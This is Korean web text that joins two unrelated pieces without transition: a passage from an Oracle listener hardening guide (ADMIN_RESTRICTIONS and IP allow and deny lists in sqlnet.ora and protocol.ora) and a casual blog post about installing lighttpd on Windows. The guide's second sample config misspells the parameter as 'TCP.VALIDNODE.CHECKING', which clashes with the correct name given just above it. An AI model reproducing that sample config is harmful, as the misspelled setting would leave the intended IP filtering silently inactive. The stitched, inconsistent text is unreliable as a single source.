또한 Listener의 설정파일인 LISTENER.ORA은 LSNRCTL 유틸리티의 SET 명령어를 사용하여 수정이 가능하므로 다음과 같은 파라미터를 수정하여 원격에서 LSNRCTL 유틸리티를 사용한 Listener의 설정을 변경할 수 없도록 해야 한다.
Listener의 설정을 변경하기 위해서는 OS상에서 LISTENER.ORA파일을 텍스트 에디터로 열어 수정해야 한다.
ADMIN_RESTRICTIONS_listener_name=ON |
4. 접근 IP 대역 제한
오라클에서 임의의 사용자에 의한 원격 접속을 차단하기 위해 Listener의 IP 접근제한을 설정할 수 있다. 특정 클라이언트에서의 접근만 가능하도록 접근 가능 IP를 설정하여 불필요한 외부의 사용자가 접근하는 것을 차단한다.
환경설정 파일에서 접근 가능한 IP 대역과 접근 불가능한 IP대역을 설정하여 네트워크 접근통제를 할 수 있으며 Oracle 8i 는 ORACLE_HOME/network/admin/protocol.ora 파일에서, Oracle9i 에서는 $ORACLE_HOME/network/admin/sqlnet.ora 파일에서 설정을 한다.
SQLNET.ORA 및 PROTOCOL.ORA파일을 OS상에서 텍스트 에디터로 열어 다음과 같이 편집하여 설정을 한다.
TCP.VALIDNODE_CHECKING = YES TCP.INVITED_NODES=(접속을 허용할 ip) TCP.EXCLUDED_NODES =(접속을 차단할 ip) |
tcp.validnode_checking를 YES 로 설정한 후 접속을 허용·차단할 IP 또는 호스트 네임을 ','를 구분자로 하여 넣어주면 된다.
다음 예제와 같이 접근통제를 할 IP, 및 네트워크 대역을 넣어 설정할 수 있다.
TCP.VALIDNODE.CHECKING = YES TCP.INVITED_NODES =(192.168.100.12, 192.168.100.13, dbms.com) TCP.EXCLUDED_NODES =(192.168.200.0) |
tcp.invited_nodes 만을 사용할 경우 허용된 IP에서만 접근이 되며 그 외의 IP에 대해서는 접근이 불가능하다. 이때 주의해야 할 것은 반드시 자기자신의 IP를 추가해줘야 한다는 것이며 tcp.excluded_nodes를 같이 사용하여 차단할 IP를 추가하여도 된다.
SQLNET.ORA 및 PROTOCOL.ORA파일을 수정한 후에는 Listener를 재시작해야 해당 설정이 적용된다.
[저자] 안랩코코넛 컨설팅사업부 김진수(midorii2@coconut.co.kr)
http://www.kevinworthington.com:8181/?cat=20
링크가 잘렸다...;;
그래서 이 링크를 보는 것이 좋을 듯.
http://wlmp.dtech.hu/wlmp라는 프로젝트이므로 더 안정적일 것이다.
FTP서버에 새로 올라온 파일을 RSS피드로 제공하려고 했다.
apache2는 일반적인 웹서버를 위한 것이기 때문에, 간단히 RSS피드를 제공하기 위한 서버로는 그 사용하는 용도에 비해 무겁다. 그렇다고 해서 berryz webshare를 쓰자니 이건 서버로 사용하기 힘들다 ㅡ,.ㅡ;;;;;; 어떤 이상한 방법을 써서 자동 시작하도록 만든다 해도 뭔가 느낌이 이상하잖아.
lighttpd는 말그대로 가벼운 httpd이다.
발음은 lighty로 한다고 한다.
윈도우용으로 컴파일 된 것이 위의 링크에 있다.
역시 거의 0 setup임.
윈도우 바이너리 파일로 설치 프로그램이 제공된다.
Next next눌러서 설치하면 설치 끝.
설정: C:\lighttpd로 들어간다. etc라는 폴더 안에 lighttpd.conf파일이 들어있다. 그것으로 설정하면 끝이다.
시작: 시작 메뉴에서 시작시킬 수 있다. 윈도우가 켜지면 바로 시작되게 하려면 시작메뉴의 시작프로그램에 넣으면 된다. or... 윈도우 2003처럼 로그인이 되지 않고 수동으로 로그인 해야 되는 환경이라면, 제어판에서 "예약된 작업"형태로, 컴퓨터를 시작할 때 실행되도록 하면 된다.
[출처] lighttpd (윈도우용)|작성자 아햏햏